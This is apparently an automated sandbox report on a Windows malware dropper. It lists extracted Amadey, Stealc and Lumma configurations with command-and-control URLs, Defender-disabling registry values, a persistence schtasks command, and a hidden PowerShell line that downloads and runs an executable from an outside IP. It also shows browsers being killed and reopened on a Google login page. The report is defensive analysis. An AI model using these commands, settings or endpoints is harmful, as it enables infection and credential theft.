Analysis
-
max time kernel
110s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 13:49
Static task
static1
Behavioral task
behavioral1
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
0be1d68cb52990f41a783f9b0aba5fc8
-
SHA1
7823839d432aad2877d8c2ef4f664b209cbc71ba
-
SHA256
a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4
-
SHA512
5347dafacf19ef7437ad2730ecf7ab522b870779989e686d91e918ec3424cf35739e7ee32dca09d86894b3c783195c0c72e12ed70e6099f698efdfbbca8e71e4
-
SSDEEP
24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a41u:mTvC/MTQYxsWR7a41
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
lumma
https://esccapewz.run/ANSbwqy
https://travewlio.shop/ZNxbHi
https://touvrlane.bet/ASKwjq
https://sighbtseeing.shop/ASJnzh
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://holidamyup.today/AOzkns
https://mtriplooqp.world/APowko
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1592-242-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer behavioral1/memory/1592-243-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer behavioral1/memory/1592-281-0x0000000000B10000-0x0000000000F6E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 7a9f3697b2.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7a9f3697b2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 7a9f3697b2.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 7a9f3697b2.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 7a9f3697b2.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 76de0e6834.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ec2d8d45c3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 00c0c811d7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3eb6a201c4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7a9f3697b2.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2936 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2936 powershell.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 115 3820 svchost015.exe 4 2936 powershell.exe 7 1532 rapes.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3eb6a201c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3eb6a201c4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7a9f3697b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 76de0e6834.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 00c0c811d7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7a9f3697b2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 76de0e6834.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ec2d8d45c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ec2d8d45c3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 00c0c811d7.exe -
Executes dropped EXE 11 IoCs
pid Process 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 1532 rapes.exe 2216 3eb6a201c4.exe 2312 8833e2c5da.exe 1592 7a9f3697b2.exe 3184 76de0e6834.exe 3452 21c94957e7.exe 3652 ec2d8d45c3.exe 3820 svchost015.exe 3172 00c0c811d7.exe 2036 svchost015.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 00c0c811d7.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 3eb6a201c4.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 7a9f3697b2.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine 76de0e6834.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Wine ec2d8d45c3.exe -
Loads dropped DLL 19 IoCs
pid Process 2936 powershell.exe 2936 powershell.exe 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 1532 rapes.exe 3652 ec2d8d45c3.exe 1532 rapes.exe 1532 rapes.exe 3172 00c0c811d7.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 7a9f3697b2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 7a9f3697b2.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\3eb6a201c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381670101\\3eb6a201c4.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\8833e2c5da.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381680101\\8833e2c5da.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\7a9f3697b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381690101\\7a9f3697b2.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000193d9-61.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 1532 rapes.exe 2216 3eb6a201c4.exe 1592 7a9f3697b2.exe 3184 76de0e6834.exe 3652 ec2d8d45c3.exe 3172 00c0c811d7.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3652 set thread context of 3820 3652 ec2d8d45c3.exe 66 PID 3172 set thread context of 2036 3172 00c0c811d7.exe 69 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8833e2c5da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00c0c811d7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 8833e2c5da.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 8833e2c5da.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 76de0e6834.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ec2d8d45c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3eb6a201c4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7a9f3697b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 21c94957e7.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe -
Kills process with taskkill 5 IoCs
pid Process 1148 taskkill.exe 612 taskkill.exe 596 taskkill.exe 2300 taskkill.exe 300 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2352 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2936 powershell.exe 2936 powershell.exe 2936 powershell.exe 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 1532 rapes.exe 2216 3eb6a201c4.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 1592 7a9f3697b2.exe 1592 7a9f3697b2.exe 1592 7a9f3697b2.exe 1592 7a9f3697b2.exe 3184 76de0e6834.exe 3184 76de0e6834.exe 3184 76de0e6834.exe 3184 76de0e6834.exe 3184 76de0e6834.exe 3184 76de0e6834.exe 3652 ec2d8d45c3.exe 3172 00c0c811d7.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 612 taskkill.exe Token: SeDebugPrivilege 596 taskkill.exe Token: SeDebugPrivilege 2300 taskkill.exe Token: SeDebugPrivilege 300 taskkill.exe Token: SeDebugPrivilege 1504 firefox.exe Token: SeDebugPrivilege 1504 firefox.exe Token: SeDebugPrivilege 1592 7a9f3697b2.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe -
Suspicious use of SendNotifyMessage 16 IoCs
pid Process 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 1504 firefox.exe 1504 firefox.exe 1504 firefox.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe 2312 8833e2c5da.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2112 wrote to memory of 2412 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2112 wrote to memory of 2412 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2112 wrote to memory of 2412 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2112 wrote to memory of 2412 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 30 PID 2112 wrote to memory of 2428 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2112 wrote to memory of 2428 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2112 wrote to memory of 2428 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2112 wrote to memory of 2428 2112 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 31 PID 2412 wrote to memory of 2352 2412 cmd.exe 33 PID 2412 wrote to memory of 2352 2412 cmd.exe 33 PID 2412 wrote to memory of 2352 2412 cmd.exe 33 PID 2412 wrote to memory of 2352 2412 cmd.exe 33 PID 2428 wrote to memory of 2936 2428 mshta.exe 34 PID 2428 wrote to memory of 2936 2428 mshta.exe 34 PID 2428 wrote to memory of 2936 2428 mshta.exe 34 PID 2428 wrote to memory of 2936 2428 mshta.exe 34 PID 2936 wrote to memory of 2944 2936 powershell.exe 37 PID 2936 wrote to memory of 2944 2936 powershell.exe 37 PID 2936 wrote to memory of 2944 2936 powershell.exe 37 PID 2936 wrote to memory of 2944 2936 powershell.exe 37 PID 2944 wrote to memory of 1532 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 38 PID 2944 wrote to memory of 1532 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 38 PID 2944 wrote to memory of 1532 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 38 PID 2944 wrote to memory of 1532 2944 TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE 38 PID 1532 wrote to memory of 2216 1532 rapes.exe 40 PID 1532 wrote to memory of 2216 1532 rapes.exe 40 PID 1532 wrote to memory of 2216 1532 rapes.exe 40 PID 1532 wrote to memory of 2216 1532 rapes.exe 40 PID 1532 wrote to memory of 2312 1532 rapes.exe 41 PID 1532 wrote to memory of 2312 1532 rapes.exe 41 PID 1532 wrote to memory of 2312 1532 rapes.exe 41 PID 1532 wrote to memory of 2312 1532 rapes.exe 41 PID 2312 wrote to memory of 1148 2312 8833e2c5da.exe 42 PID 2312 wrote to memory of 1148 2312 8833e2c5da.exe 42 PID 2312 wrote to memory of 1148 2312 8833e2c5da.exe 42 PID 2312 wrote to memory of 1148 2312 8833e2c5da.exe 42 PID 2312 wrote to memory of 612 2312 8833e2c5da.exe 45 PID 2312 wrote to memory of 612 2312 8833e2c5da.exe 45 PID 2312 wrote to memory of 612 2312 8833e2c5da.exe 45 PID 2312 wrote to memory of 612 2312 8833e2c5da.exe 45 PID 2312 wrote to memory of 596 2312 8833e2c5da.exe 47 PID 2312 wrote to memory of 596 2312 8833e2c5da.exe 47 PID 2312 wrote to memory of 596 2312 8833e2c5da.exe 47 PID 2312 wrote to memory of 596 2312 8833e2c5da.exe 47 PID 2312 wrote to memory of 2300 2312 8833e2c5da.exe 49 PID 2312 wrote to memory of 2300 2312 8833e2c5da.exe 49 PID 2312 wrote to memory of 2300 2312 8833e2c5da.exe 49 PID 2312 wrote to memory of 2300 2312 8833e2c5da.exe 49 PID 2312 wrote to memory of 300 2312 8833e2c5da.exe 51 PID 2312 wrote to memory of 300 2312 8833e2c5da.exe 51 PID 2312 wrote to memory of 300 2312 8833e2c5da.exe 51 PID 2312 wrote to memory of 300 2312 8833e2c5da.exe 51 PID 2312 wrote to memory of 2212 2312 8833e2c5da.exe 53 PID 2312 wrote to memory of 2212 2312 8833e2c5da.exe 53 PID 2312 wrote to memory of 2212 2312 8833e2c5da.exe 53 PID 2312 wrote to memory of 2212 2312 8833e2c5da.exe 53 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 PID 2212 wrote to memory of 1504 2212 firefox.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn ySgTlmaKy2s /tr "mshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2352
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\RXRQnOs6R.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"C:\Users\Admin\AppData\Local\TempNKEBMFAXNY58WRHQXWUUADBW4WS6BMJ1.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\10381670101\3eb6a201c4.exe"C:\Users\Admin\AppData\Local\Temp\10381670101\3eb6a201c4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\10381680101\8833e2c5da.exe"C:\Users\Admin\AppData\Local\Temp\10381680101\8833e2c5da.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:612
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1504 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.0.1543103055\488885684" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1212 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02658747-8900-4dac-93e9-cf54ab49ea9b} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1296 121f3858 gpu9⤵PID:2404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1504.1.2087288356\1981939181" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {722d030a-66b9-4808-b954-f2787ec2acfe} 1504 "\\.\pipe\gecko-crash-server-pipe.1504" 1504 d71b58 socket9⤵PID:2760
-
-
